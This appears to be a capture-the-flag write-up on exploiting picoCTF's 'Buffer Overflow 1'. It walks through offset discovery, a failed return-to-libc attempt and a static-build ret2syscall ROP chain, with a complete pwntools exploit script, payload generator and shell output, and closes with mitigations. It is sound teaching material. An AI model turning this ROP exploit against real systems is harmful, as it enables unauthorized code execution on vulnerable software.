labs June 7, 2026 · 22 min read

Buffer Overflow 1, the long way round: when `gets()` hands you RIP but NX and an empty toolbox push you into a syscall

picoCTF's "Buffer Overflow 1" is a textbook `gets()` stack smash, but the moment you keep NX enabled the textbook answer (return-into-libc) collapses, because the binary is too gadget-poor to offer a single argument-loading gadget. This is the story of taking the official picoCTF source, compiling it honestly, hitting a dead end, and routing around it with a leak-free `ret2syscall` that calls `execve("/bin/sh", NULL, NULL)` directly.

solve · beginner target → https://play.picoctf.org/practice?category=2


The target

picoCTF ships the source for this one in its own platform repository. I pulled it straight from the canonical path — no writeups, no solve scripts, just vuln.c and its problem.json:

$ curl -s https://raw.githubusercontent.com/picoCTF/picoCTF/master/\
problems/examples/binary-exploitation/buffer-overflow-1/vuln.c

The metadata tells you what kind of problem this is supposed to be (problem.json, fetched from the same directory):

{
  "name": "Buffer Overflow 1",
  "category": "Binary Exploitation",
  "hints": ["This is a classic buffer overflow with no modern protections."],
  "author": "Tim Becker",
  "organization": "ForAllSecure",
  "event": "Sample"
}

"A classic buffer overflow with no modern protections." Hold that thought — it's a half-truth that becomes the whole post. And the source itself (sha256 2babfea3150554aea3388a1bf9edd1b309940d5a6a8c52877f45f27ea4475209):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 128

void vuln(){
  char buf[BUFSIZE];
  gets(buf);
  puts(buf);
  fflush(stdout);
}

int main(int argc, char **argv){
  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  vuln();
  return 0;
}

There it is, the cardinal sin in three letters: gets(buf). gets() reads a line from stdin into buf with no length argument and therefore no bound. buf is 128 bytes; stdin is unbounded. The function was so dangerous that C11 removed it from the standard library entirely. glibc follows suit: its <stdio.h> no longer declares gets when compiling as C11 or later, and since GCC 14 an implicit function declaration is a hard error rather than a warning. So compiling the source as-is on this Kali box (glibc 2.42, gcc 15.2) fails:

vuln.c:11:3: error: implicit declaration of function 'gets';
   did you mean 'fgets'? [-Wimplicit-function-declaration]

The symbol still exists in glibc 2.42 and still works; only the prototype is gone. To keep vuln.c byte-for-byte identical to the official source, I supplied the missing prototypes with a forced include rather than editing the file:

/* protos.h — forced in via -include so vuln.c stays pristine */
#define _GNU_SOURCE
#include <sys/types.h>
char *gets(char *s);
int setresgid(gid_t rgid, gid_t egid, gid_t sgid);

$ gcc -fno-stack-protector -no-pie -include protos.h -o vuln vuln.c
/usr/bin/ld: warning: the `gets' function is dangerous and should not be used.

The linker's parting words are not subtle.

checksec: the half-truth in the hint

Here's the dynamic build under pwntools' checksec:

$ python3 -c "from pwn import ELF; ELF('vuln')"
[*] '/labs-output/artifacts/vuln'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No

Decode that line by line, because every one of these flags decides what the exploit can and cannot do:

No canary — there is no stack cookie between buf and the saved return address. We can overflow straight through to RIP without tripping __stack_chk_fail. This is the "no modern protection" the hint brags about.
No PIE, base 0x400000 — the binary is loaded at a fixed address every run. The PLT, the GOT, every byte of .text, and therefore every gadget have constant addresses. No leak needed to find code inside the binary.
Partial RELRO — the GOT is still writable; relevant only if we wanted to go the ret2dlresolve route (we don't, in the end).
NX enabled — and here is where the hint lies. The stack is mapped no-execute. The "classic" picoCTF solution to a gets() overflow is to drop shellcode into buf and return to it. With NX on, that page faults the instant the CPU tries to fetch an instruction from the stack. Shellcode-on-the-stack is dead.

I left NX on deliberately. picoCTF's reference build for this problem disables it (-z execstack) so beginners can practice stack shellcode — but that path is (a) already well-trodden beginner ground, and (b) the less interesting half of the lesson. The interesting half is: no canary gives you RIP, but NX takes away the stack; now what? Everything below is the answer to "now what."

Mapping the crash: where is RIP?

Two functions, both tiny. objdump -d -M intel gives the whole of vuln:

0000000000401166 <vuln>:
  401166: push   rbp
  401167: mov    rbp,rsp
  40116a: add    rsp,0xffffffffffffff80   ; reserve 0x80 = 128 bytes
  40116e: lea    rax,[rbp-0x80]           ; rax = &buf
  401172: mov    rdi,rax
  401175: call   401050 <gets@plt>        ; gets(buf)  <-- unbounded
  40117a: lea    rax,[rbp-0x80]
  40117e: mov    rdi,rax
  401181: call   401030 <puts@plt>        ; puts(buf)  (echoes our input)
  401186: mov    rax,QWORD PTR [rip+0x2eab]   # 404038 <stdout>
  40118d: mov    rdi,rax
  401190: call   401060 <fflush@plt>
  401195: nop
  401196: leave                           ; rsp=rbp; pop rbp
  401197: ret                             ; <-- pops our bytes into RIP

The stack frame is dead simple. buf sits at rbp-0x80. Above it lives the saved RBP (8 bytes at [rbp]), and above that lives the saved return address (8 bytes at [rbp+8]). So the distance from the start of buf to the saved RIP is 0x80 + 8 = 136 bytes. The leave; ret at the end is the trapdoor: leave restores RSP to point at the saved RIP, and ret pops it into the instruction pointer.

main just calls vuln and does the setresgid dance:

0000000000401198 <main>:
  401198: push   rbp
  401199: mov    rbp,rsp
  40119c: sub    rsp,0x20
  ...
  4011a7: call   401070 <getegid@plt>
  4011bc: call   401040 <setresgid@plt>
  4011c1: call   401166 <vuln>
  4011c6: mov    eax,0x0
  4011cb: leave
  4011cc: ret

Rather than eyeball the offset, I let pwntools and GDB measure it. Feed a De Bruijn ("cyclic") pattern, crash, and read the bytes the ret was about to pop (the first four are all cyclic_find needs):

$ python3 -c "from pwn import *; print(cyclic(200).decode())" > /tmp/cyc.txt
$ gdb -q -batch -ex 'run < /tmp/cyc.txt' -ex 'info registers rsp rip' -ex 'x/s $rsp' ./vuln
Program received signal SIGSEGV, Segmentation fault.
0x0000000000401197 in vuln ()
rsp  0x7ffe301b2378
rip  0x401197 <vuln+49>           ; faulted at the `ret`
x/s $rsp: "jaabkaablaabmaab..."     ; what `ret` is about to load

The fault is at the ret (0x401197), and RSP points at the substring "jaab". cyclic_find turns that back into a distance:

$ python3 -c "from pwn import *; print(cyclic_find(b'jaab'))"
136
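If you don't have pwntools handy, the lookup can be sketched in plain Python. This is my own minimal re-implementation of the standard de Bruijn generator, not pwntools' code. It assumes the same defaults that produced the pattern above (lowercase alphabet, 4-byte windows), and the helper names pattern and pattern_find are hypothetical.

```python
from itertools import islice
import string


def de_bruijn(alphabet, n):
    """Yield a de Bruijn sequence: every length-n window over `alphabet` occurs once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern(length, n=4):
    """First `length` bytes of the sequence (the generator is lazy, so this is cheap)."""
    return bytes(islice(de_bruijn(string.ascii_lowercase.encode(), n), length))


def pattern_find(needle, length=200, n=4):
    """Offset of `needle` inside the pattern, or -1 if it is not there."""
    return pattern(length, n).find(needle)


offset = pattern_find(b"jaab")
print(pattern(16), offset)
```

Because every 4-byte window is unique, the bytes sitting at RSP identify exactly one position in the input, which is why a single crash is enough to recover the offset.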

136, exactly as the frame layout predicted. To make the control unambiguous I sent 136 filler bytes plus a recognizable 8-byte value. A non-canonical address (top bits set) faults at the ret with a #GP, which is misleading, so I used a canonical-but-unmapped value:

$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*136 + bytes.fromhex('efbeadde42420000'))" > /tmp/rip2.bin
$ gdb -q -batch -ex 'run < /tmp/rip2.bin' -ex 'printf "RIP = 0x%lx\n", $rip' ./vuln
Program received signal SIGSEGV, Segmentation fault.
RIP = 0x4242deadbeef

RIP = 0x4242deadbeef. We own the instruction pointer completely. The little-endian ef be ad de 42 42 00 00 became 0x00004242deadbeef. The primitive is confirmed: arbitrary control of RIP at a fixed 136-byte offset, no canary in the way.
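The byte-order and canonical-address points can be checked without a debugger. The sketch below is stdlib-only. Its p64 is a stand-in for the pwntools helper of the same name, and is_canonical is a hypothetical helper that assumes 48-bit virtual addresses (ordinary 4-level paging), which I have not verified for every machine you might run this on.

```python
import struct


def p64(value):
    """Pack an unsigned 64-bit integer little-endian (same job as pwntools' p64)."""
    return struct.pack("<Q", value)


def is_canonical(addr, va_bits=48):
    """True if bits 63..(va_bits-1) are all zeros or all ones."""
    top = addr >> (va_bits - 1)
    return top == 0 or top == (1 << (64 - va_bits + 1)) - 1


OFFSET = 136                      # buf (128) + saved rbp (8)
marker = 0x00004242DEADBEEF       # canonical but unmapped, as in the GDB run
payload = b"A" * OFFSET + p64(marker)

print(p64(marker).hex(), is_canonical(marker), is_canonical(0xDEADBEEFDEADBEEF))
```

A marker like 0xdeadbeefdeadbeef fails the check, which is the case where the CPU raises #GP at the ret and RIP never visibly changes.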

The control flow we're about to build is a chain of "return to gadget, gadget returns, return to next gadget." It helps to picture it as a little state machine where each node is a gadget and the ret at the end of each node is the edge to the next.

Why the textbook answer dies here

NX is on, so we can't run code on the stack. The standard next move for a 64-bit, no-PIE binary is return-to-libc: leak a libc address, compute the libc base, then return into system("/bin/sh") (or chain an execve). The System V AMD64 calling convention puts the first integer argument in rdi, so to call system(ptr) we need a gadget like pop rdi ; ret to load ptr from our controlled stack.

So: does this binary contain pop rdi ; ret?

$ ROPgadget --binary vuln | grep -E ": pop (rdi|rsi|rdx|rax)"
(no output)
$ ROPgadget --binary vuln | grep -c " : "
68

Sixty-eight gadgets total, and not one of them pops rdi, rsi, rdx, or rax. A dynamically-linked, minimally-compiled C program like this contains almost nothing but the CRT stubs (_start, __do_global_dtors_aux, frame_dummy) and the PLT. The full inventory is junk like:

0x0000000000401016 : ret
0x000000000040114d : pop rbp ; ret
0x0000000000401196 : leave ; ret
0x0000000000401012 : add rsp, 8 ; ret
0x00000000004010dc : jmp rax
0x0000000000401010 : call rax
0x00000000004010d7 : mov edi, 0x404038 ; jmp rax

I spent real time here trying to make a leak work, because the leak is the crux of any ret2libc. The plan would be: call puts(some_GOT_entry) to print a libc pointer. To call puts I need rdi = the GOT address. I have no pop rdi, but I do have that curious mov edi, 0x404038 ; jmp rax gadget at 0x4010d7. And 0x404038 is the slot holding the stdout pointer (you can see it referenced in vuln's disassembly: mov rax,[rip+0x2eab] # 404038). At runtime that slot holds a libc address. So mov edi,0x404038 ; jmp rax followed by rax = puts@plt would call puts(&stdout_ptr) and leak libc!

The catch: that gadget ends in jmp rax, so I need rax = puts@plt = 0x401030 before I reach it. And there is no way to load rax — no pop rax, no mov rax, imm, nothing. After the overflow, rax holds whatever fflush returned (0). jmp 0 is a crash. I tried every gadget that touches rax: mov eax, 0 ; leave ; ret (sets it to zero), add eax, 0x2ef3 ; ... (depends on the existing value), call rax/jmp rax (consume it). None of them loads a chosen value.

Conclusion of the dead end: this dynamic binary has RIP control but is too gadget-poor to set up any function call with a controlled argument. No leak primitive, no system argument, no __libc_csu_init universal gadget (glibc 2.34+ no longer provides it — I checked: there's no __libc_csu_init symbol). ret2dlresolve would dodge the leak, but it still needs rdi set for the resolved system's argument, and we still can't set rdi. The dynamic build, with NX on, is a genuine wall for beginner techniques.

Routing around it: static linking turns the binary into its own libc

The wall exists because all the useful gadgets live in libc, and at runtime libc is (a) ASLR-randomized and (b) reachable only through a leak we can't perform. So remove both problems at once: link libc into the binary statically. A static, no-PIE binary contains all of glibc's code at fixed addresses. Every pop rdi ; ret in glibc is now in our binary at a constant address. No leak. No ASLR on the code we care about. The whole exploit becomes self-contained and — a real bonus for a writeup — reproducible on any machine without matching a specific libc version.

$ gcc -static -fno-stack-protector -no-pie -include protos.h -o vuln_static vuln.c
$ file vuln_static
vuln_static: ELF 64-bit LSB executable, x86-64, statically linked,
   BuildID[sha1]=3269cb1d..., for GNU/Linux 3.2.0, not stripped
$ python3 -c "from pwn import ELF; ELF('vuln_static')"
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No

One subtlety: checksec now says "Canary found." That's a false signal in our favor. checksec reports a canary if the binary references __stack_chk_fail anywhere — and static glibc's own internals use stack protection, so the symbol is present. But our vuln() was compiled -fno-stack-protector, so its frame has no cookie. The proof is empirical: the overflow below sails straight to RIP. The crash offset is unchanged:

$ gdb -q -batch -ex 'run < /tmp/cyc.txt' -ex 'info registers rsp rip' ./vuln_static
Program received signal SIGSEGV, Segmentation fault.
rip  0x4018d6 <vuln+49>     ; same `ret`, same 136-byte offset

What static linking gives — and what it doesn't

The good news first. ROPgadget against vuln_static finds the full execve toolkit:

gadget	address	note
`pop rdi ; ret`	`0x402218`	sets arg1 (path)
`pop rsi ; ret`	`0x4049ce`	sets arg2 (argv)
`pop rax ; ret`	`0x40801f`	sets syscall number
`pop rdx ; add [rax],al ; ret`	`0x411ba1`	sets arg3 (envp), unintended
`syscall`	`0x401308`	the syscall instruction
`ret`	`0x401016`	consumes 8 bytes to restore 16-byte rsp alignment
`gets` (function)	`0x404ad0`	to plant the missing string

The pop rdx gadget deserves a closer look, because it isn't a "real" instruction the compiler emitted — it's an unintended gadget hiding inside a lea. Disassembling around 0x411ba1:

411b9d: 48 8d 05 1c 5a 00 00   lea    rax,[rip+0x5a1c]   # __strchrnul_evex
411ba4: c3                     ret

That lea is the 7 bytes 48 8d 05 1c 5a 00 00. Start decoding one byte into the displacement, at 0x411ba1, and the CPU sees a completely different instruction stream:

411ba1: 5a       pop rdx
411ba2: 00 00    add byte ptr [rax], al
411ba4: c3       ret

5a is pop rdx; 00 00 is add [rax], al; c3 is the ret that closes the lea. So we get pop rdx for free — but with a barb: the add byte ptr [rax], al writes a byte to wherever rax points. If rax is garbage, that's a segfault. We have to make sure rax points at writable memory before this gadget runs. That single constraint shapes the ordering of the whole chain.
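The overlap is easy to confirm with a byte search. This sketch takes the eight bytes from the disassembly above (the lea plus its ret) and looks for the encoding of pop rdx ; add [rax], al ; ret inside them. The variable names are mine.

```python
LEA_ADDR = 0x411B9D                               # address of the lea, from the listing
code = bytes.fromhex("488d051c5a0000" "c3")       # lea rax,[rip+0x5a1c] ; ret

gadget = bytes.fromhex("5a" "0000" "c3")          # pop rdx ; add [rax],al ; ret
idx = code.find(gadget)                           # byte offset of the gadget inside the lea
gadget_addr = LEA_ADDR + idx

# The displacement is the little-endian dword after the 3-byte opcode/modrm prefix;
# its second byte (0x5a) is what decodes as `pop rdx` when entered mid-instruction.
disp = int.from_bytes(code[3:7], "little")

print(idx, hex(gadget_addr), hex(disp))
```

The gadget exists only because the displacement happens to contain 0x5a followed by two zero bytes, so a rebuild that moves the lea's target will very likely remove it.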

Now the bad news, and it's why this is a ret2syscall and not a ret2libc:

$ python3 -c "d=open('vuln_static','rb').read(); print('count /bin/sh:', d.count(b'/bin/sh'))"
count /bin/sh: 0
$ rabin2 -qs vuln_static | grep -wE "system|execve"
(nothing)

There is no /bin/sh string in the binary, and no system or execve symbol. Static linking only pulls in object files that something references. Our source never calls system, so the linker dropped system's code — and the "/bin/sh" literal that lives in the same translation unit went with it. So I can't ret2libc into system("/bin/sh") (no system), and I can't even point an argument at "/bin/sh" (no string). Two problems, one solution: invoke the execve syscall directly (no system needed), and plant the "/bin/sh" string myself using the one libc function the binary does still link and reference — gets.

The plan, made precise

Linux execve is syscall number 59 on x86-64. The kernel reads its arguments from registers:

rax = 59            ; __NR_execve
rdi = char *path    ; pointer to "/bin/sh"
rsi = char **argv   ; NULL is accepted by Linux
rdx = char **envp   ; NULL

Linux has long accepted a NULL argv, so this isn't a recent affordance, but the behavior isn't uniform. Since 5.18 the kernel substitutes a single empty string (argc=1, argv[0]="") and logs a one-time warning; older kernels pass argc=0 through, leaving argv[0] == NULL, which some programs mishandle. NULL argv is therefore not universally safe across kernels and Unixes, and a real argv = ["/bin/sh", NULL] is the portable choice. I use NULL here anyway, because it keeps the chain short and works on the target kernel. If you need the portability, note that the array must live at a known address, and the stack's address is randomized; the natural fix is to plant a two-qword argv array in .bss next to the string (the same gets call can write it) and aim the existing pop rsi at it.
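For the portable variant, here is a sketch of what the second input line could look like. I did not run this variant against the binary. ARGV is a hypothetical address I chose (the eight bytes right after the string), and the only change to the chain would be loading ARGV into rsi instead of 0.

```python
import struct

BSS = 0x4AA000                     # where "/bin/sh" is planted (the post's .bss slot)
path = b"/bin/sh\x00"              # exactly 8 bytes, so the array after it stays 8-byte aligned
ARGV = BSS + len(path)             # hypothetical: argv array placed right behind the string

# argv = { BSS, NULL }: gets() copies embedded NUL bytes, it only stops at '\n' or EOF.
line2 = path + struct.pack("<QQ", BSS, 0)

# A newline anywhere in the line would end the gets() read early.
assert b"\n" not in line2
print(hex(ARGV), line2.hex())
```

With this line sent in place of "/bin/sh", the kernel would see execve("/bin/sh", ["/bin/sh", NULL], NULL) once rsi holds ARGV.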

So the chain has to do three things, in this order, respecting the pop rdx barb:

Plant the string. vuln()'s gets already returned (it consumed our overflow line). But gets is a real function at 0x404ad0; we can call it again from the ROP chain. Set rdi to a fixed, writable .bss address and return into gets. It reads our second input line into .bss. We send "/bin/sh".
Set rdx = 0, but first point rax at harmless scratch .bss, so the gadget's add [rax], al lands on unused memory rather than on our freshly planted string.
Set rdi, rsi, rax to the path pointer, 0, and 59, then hit syscall.

The .bss is the natural scratchpad: it's writable and, thanks to no-PIE, at a fixed address. rabin2 -S puts .bss at 0x4a8aa0 spanning 0x5808 bytes. I picked 0x4aa000 for the string and 0x4aa800 for the scratch byte — both comfortably inside .bss, away from the glibc globals clustered at its start.

One more detail that bites every 64-bit ROP author: stack alignment. The SysV ABI requires rsp to be 16-byte aligned at a call, and glibc functions like gets use SSE instructions (movaps) that fault on a misaligned stack. Returning into gets mid-chain can leave rsp 8-off. The fix is a one-slot insurance policy: a bare ret gadget (0x401016) before the gets call, which consumes 8 bytes of stack and flips the alignment back.
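The alignment arithmetic can be modeled in a few lines. The sketch assumes main called vuln with rsp 16-byte aligned (the normal ABI state), so the saved-RIP slot sits at an address of the form 16k+8. A function entered through a real call sees rsp % 16 == 8, and that is the state gets expects. The helper name is hypothetical.

```python
SAVED_RIP_MOD16 = 8   # assumption: vuln was entered by `call` from a 16-aligned rsp


def rsp_mod16_on_entry(chain, target):
    """rsp % 16 at the moment a `ret` transfers control to `target`.

    `chain` lists the 8-byte slots starting at the saved-RIP slot. The ret that
    pops slot i leaves rsp pointing at slot i+1.
    """
    i = chain.index(target)
    return (SAVED_RIP_MOD16 + 8 * (i + 1)) % 16


with_ret = ["pop rdi", "BSS", "ret", "gets"]
without_ret = ["pop rdi", "BSS", "gets"]

print(rsp_mod16_on_entry(with_ret, "gets"), rsp_mod16_on_entry(without_ret, "gets"))
```

A result of 8 matches what a genuine call would produce. A result of 0 is the misaligned case in which movaps can fault.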

A worked example: the chain qword by qword

Here is the exact stack image the overflow writes, starting at the saved-RIP slot (buf+136 and upward in memory). Each row is one 8-byte stack slot; execution consumes them in table order, row 0 first, moving toward higher addresses:

#	value	effect when `ret` reaches it
—	`b'A' * 136`	filler: 128-byte `buf` + 8-byte saved RBP
0	`0x402218`	`pop rdi ; ret`
1	`0x4aa000`	→ `rdi = 0x4aa000` (the `.bss` path slot)
2	`0x401016`	`ret` — realigns RSP to 16 bytes
3	`0x404ad0`	→ `gets(rdi)`: reads line 2 (`"/bin/sh"`) into `0x4aa000`
4	`0x40801f`	`pop rax ; ret`
5	`0x4aa800`	→ `rax = 0x4aa800` (scratch, so the next gadget's write is harmless)
6	`0x411ba1`	`pop rdx ; add [rax],al ; ret`
7	`0x0`	→ `rdx = 0`; `add [0x4aa800],al` adds `al`=`0x00` (low byte of `0x4aa800`) — byte unchanged
8	`0x402218`	`pop rdi ; ret`
9	`0x4aa000`	→ `rdi = 0x4aa000` (pointer to `"/bin/sh"`)
10	`0x4049ce`	`pop rsi ; ret`
11	`0x0`	→ `rsi = 0` (argv = NULL)
12	`0x40801f`	`pop rax ; ret`
13	`0x3b`	→ `rax = 59` (`__NR_execve`)
14	`0x401308`	`syscall` → `execve("/bin/sh", NULL, NULL)`

Trace it as the CPU would. After vuln's ret, RSP points at row 0. pop rdi loads 0x4aa000 into rdi and returns to row 2's ret, which simply returns again (consuming a slot to fix alignment) into gets at row 3. gets reads our second line — "/bin/sh\n" — and writes "/bin/sh\0" to 0x4aa000; it returns its argument, so rax is now 0x4aa000 too. It returns to row 4. pop rax overwrites rax with 0x4aa800 (scratch), so when pop rdx ; add [rax],al runs at row 6 it pops rdx = 0 and adds al (= 0x00, the low byte of 0x4aa800) to the byte at 0x4aa800, leaving it unchanged. Then pop rdi = 0x4aa000, pop rsi = 0, pop rax = 59, and syscall. The kernel sees execve("/bin/sh", NULL, NULL) and replaces the process with a shell.
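The same trace can be replayed with a toy model. This is not an emulator. It hard-codes the effect of each gadget from the table, treats gets as "copy one line plus a NUL to [rdi] and return rdi", and starts with rax = 0 (what fflush returned). The run function and its dictionary of registers are my own scaffolding.

```python
POP_RDI, POP_RSI, POP_RAX = 0x402218, 0x4049CE, 0x40801F
POP_RDX, SYSCALL, RET, GETS = 0x411BA1, 0x401308, 0x401016, 0x404AD0
BSS, SCRATCH = 0x4AA000, 0x4AA800

chain = [POP_RDI, BSS, RET, GETS, POP_RAX, SCRATCH, POP_RDX, 0,
         POP_RDI, BSS, POP_RSI, 0, POP_RAX, 59, SYSCALL]


def run(chain, stdin_lines):
    """Walk the chain the way `ret` would; return (regs, mem) on reaching syscall."""
    regs = {"rax": 0, "rdi": 0, "rsi": 0, "rdx": 0}
    mem = {}                                   # sparse byte-addressed memory
    stack = list(chain)
    lines = list(stdin_lines)
    simple_pops = {POP_RDI: "rdi", POP_RSI: "rsi", POP_RAX: "rax"}
    while stack:
        target = stack.pop(0)                  # the value `ret` loads into rip
        if target == RET:
            continue                           # bare ret: just consume the slot
        if target in simple_pops:
            regs[simple_pops[target]] = stack.pop(0)
        elif target == POP_RDX:
            regs["rdx"] = stack.pop(0)
            addr, al = regs["rax"], regs["rax"] & 0xFF
            mem[addr] = (mem.get(addr, 0) + al) & 0xFF   # the stray add [rax],al
        elif target == GETS:
            for off, byte in enumerate(lines.pop(0) + b"\x00"):
                mem[regs["rdi"] + off] = byte
            regs["rax"] = regs["rdi"]          # gets returns its buffer
        elif target == SYSCALL:
            return regs, mem
    raise RuntimeError("chain ended without reaching syscall")


regs, mem = run(chain, [b"/bin/sh"])
path = bytes(mem[BSS + i] for i in range(7))
print(regs, path)
```

Reordering the chain in this model (for example, dropping the pop rax before pop rdx) is a cheap way to see which byte the stray add would touch before trying it on the real binary.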

The exploit

The whole thing in pwntools. The gadget constants are exactly the ones from the table above; gets is resolved from the symbol table.

#!/usr/bin/env python3
# ret2syscall execve("/bin/sh",0,0) against picoCTF "Buffer Overflow 1"
# (Tim Becker / ForAllSecure), statically linked, NX on, no PIE, no canary
# on the vulnerable frame. No libc leak needed: every address is fixed.
from pwn import *

context.arch = 'amd64'
context.log_level = 'info'

elf = context.binary = ELF('./vuln_static')

# --- gadgets (from ROPgadget against vuln_static) ---
POP_RDI = 0x402218   # pop rdi ; ret
POP_RSI = 0x4049ce   # pop rsi ; ret
POP_RAX = 0x40801f   # pop rax ; ret
POP_RDX = 0x411ba1   # pop rdx ; add byte ptr [rax], al ; ret  (unintended, inside a lea)
SYSCALL = 0x401308   # syscall
RET     = 0x401016   # ret            (consumes 8 bytes to restore 16-byte rsp alignment)
GETS    = elf.symbols['gets']         # 0x404ad0 — plant the /bin/sh string ourselves

BSS     = 0x4aa000   # writable .bss page, holds "/bin/sh"
SCRATCH = 0x4aa800   # writable .bss qword; absorbs the gadget's stray add [rax],al

OFFSET  = 136        # 128-byte buf + 8-byte saved rbp -> saved RIP

def build():
    pad = b'A' * OFFSET
    rop  = b''
    # stage 1: gets(BSS) — read "/bin/sh" from our 2nd input line into fixed .bss
    rop += p64(POP_RDI) + p64(BSS)
    rop += p64(RET)                 # consume 8 bytes to restore 16-byte rsp alignment so glibc gets() movaps is happy
    rop += p64(GETS)
    # stage 2: rdx = 0 (envp). rax must point at writable mem first, because the
    #          gadget also does add [rax],al — aim it at unused SCRATCH.
    rop += p64(POP_RAX) + p64(SCRATCH)
    rop += p64(POP_RDX) + p64(0)
    # stage 3: execve("/bin/sh", NULL, NULL)  -> rax=59
    rop += p64(POP_RDI) + p64(BSS)
    rop += p64(POP_RSI) + p64(0)
    rop += p64(POP_RAX) + p64(59)
    rop += p64(SYSCALL)
    return pad + rop

def main():
    payload = build()
    log.info("payload length: %d bytes", len(payload))
    p = process(elf.path)
    p.sendline(payload)     # line 1: overflow + ROP chain (consumed by vuln's gets)
    p.sendline(b'/bin/sh')  # line 2: planted by our ROP-called gets() into .bss
    # drive the spawned shell non-interactively
    p.sendline(b'echo PWNED_$((6*7)); id; cat flag.txt 2>/dev/null; exit')
    out = p.recvall(timeout=3)
    print(out.decode('latin1'))

if __name__ == '__main__':
    main()
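One sanity check worth running before firing: gets stops at the first newline, so a single 0x0a byte inside any address or constant would silently truncate the chain. NUL bytes are fine. The sketch below rebuilds the payload with the stdlib only and scans it. The constants are the ones from solve.py.

```python
import struct

OFFSET = 136
chain = [0x402218, 0x4AA000, 0x401016, 0x404AD0,   # pop rdi, BSS, ret, gets
         0x40801F, 0x4AA800, 0x411BA1, 0,          # pop rax, SCRATCH, pop rdx, 0
         0x402218, 0x4AA000, 0x4049CE, 0,          # pop rdi, BSS, pop rsi, 0
         0x40801F, 59, 0x401308]                   # pop rax, 59, syscall

payload = b"A" * OFFSET + b"".join(struct.pack("<Q", q) for q in chain)

# Offsets of any byte that would terminate the gets() read early.
bad = [i for i, b in enumerate(payload) if b == 0x0A]

print(len(payload), bad)
```

If a rebuild ever yields a gadget address containing 0x0a, pick another instance of the same gadget rather than trying to escape the byte.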

Watching it fire

First, prove the register state at the moment of truth. I dumped both input lines (the overflow payload and the "/bin/sh" line) to a file and broke on the syscall instruction:

# genpayload.py — dump line 1 + line 2 to /tmp/payload.bin for GDB
from pwn import p64
POP_RDI=0x402218; POP_RSI=0x4049ce; POP_RAX=0x40801f
POP_RDX=0x411ba1; SYSCALL=0x401308; RET=0x401016; GETS=0x404ad0
BSS=0x4aa000; SCRATCH=0x4aa800; OFFSET=136
rop  = p64(POP_RDI)+p64(BSS)+p64(RET)+p64(GETS)
rop += p64(POP_RAX)+p64(SCRATCH)+p64(POP_RDX)+p64(0)
rop += p64(POP_RDI)+p64(BSS)+p64(POP_RSI)+p64(0)
rop += p64(POP_RAX)+p64(59)+p64(SYSCALL)
open('/tmp/payload.bin','wb').write(b'A'*OFFSET+rop+b'\n/bin/sh\n')

$ python3 genpayload.py
$ gdb -q -batch -ex 'break *0x401308' -ex 'run < /tmp/payload.bin' \
      -ex 'printf "rax=%ld rdi=0x%lx rsi=0x%lx rdx=0x%lx\n", $rax,$rdi,$rsi,$rdx' \
      -ex 'x/s $rdi' ./vuln_static
Breakpoint 1, 0x0000000000401308 in abort ()
rax=59 rdi=0x4aa000 rsi=0x0 rdx=0x0
0x4aa000 <__pthread_keys+1952>:  "/bin/sh"

rax=59, rdi → "/bin/sh", rsi=0, rdx=0. (GDB labels 0x401308 as inside abort because the syscall instruction we borrowed happens to live in glibc's abort — irrelevant, we only want the two opcode bytes. Likewise 0x4aa000 is symbolized as __pthread_keys+1952, which is just an unused .bss slot we commandeered.) Those are precisely the arguments to execve("/bin/sh", NULL, NULL).

Now run it for real against a planted flag.txt:

$ echo 'picoCTF{r0p_t0_execve_4a3f9c}' > flag.txt
$ python3 solve.py
[*] '/labs-output/artifacts/vuln_static'
[*] payload length: 256 bytes
[+] Starting local process '/labs-output/artifacts/vuln_static': pid 1670
[*] Process '...vuln_static' stopped with exit code 0 (pid 1670)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."@
PWNED_42
uid=0(root) gid=0(root) groups=0(root)
picoCTF{r0p_t0_execve_4a3f9c}

The leading wall of As is vuln's own puts(buf) echoing our padding back. The echo runs on into the first ROP qword: the non-printable 0x18 (the low byte of POP_RDI, 0x402218), then the printable "@ (0x22, 0x40), and puts stops at the first 0x00. Then PWNED_42 (the shell evaluated $((6*7))), uid=0(root) from id, and the flag from cat. The execve succeeded; the process became /bin/sh; the shell ran our commands. Game over.
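The tail of that echo is predictable from the payload alone, since puts prints up to the first NUL byte. A short stdlib sketch (variable names mine):

```python
import struct

payload_head = b"A" * 136 + struct.pack("<Q", 0x402218)   # padding + POP_RDI slot

# puts() stops at the first NUL, which is the fourth byte of the little-endian address.
echoed = payload_head.split(b"\x00", 1)[0]

print(len(echoed), echoed[-3:])
```

The three bytes after the padding are 0x18, 0x22 and 0x40, which is why the terminal shows the As followed by "@.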

Mitigations: what was absent, and what would have stopped us

Walking back up the mitigation stack, here's exactly which protection each step needed to be missing:

Stack canary (absent). A canary between buf and the saved RIP would have detected the linear overflow and called __stack_chk_fail before vuln ever returned. The entire exploit depends on reaching RIP, which depends on there being no cookie. This is the one mitigation the picoCTF hint is honest about.
NX (present). NX is why this isn't a four-line shellcode exploit. It forced us off the stack and into reused code — ROP. NX is doing its job; it just can't stop code reuse.
PIE / full ASLR (absent on the binary). No-PIE is what makes a leak-free exploit possible. Every gadget address (0x402218, 0x401308, …) is hard-coded because the binary loads at 0x400000 every time. Turn PIE on and all those constants randomize per-run; you'd need an info leak first — and as the dynamic dead-end showed, this binary gives you no leak primitive. PIE would likely have killed the whole approach.
RELRO (Partial). Didn't matter here because we never touched the GOT, but Full RELRO would close the ret2dlresolve door entirely.
Removing gets (the real fix). Every other mitigation is a seatbelt. The actual bug is calling an unbounded read into a fixed buffer. fgets(buf, BUFSIZE, stdin) and the entire post evaporates.

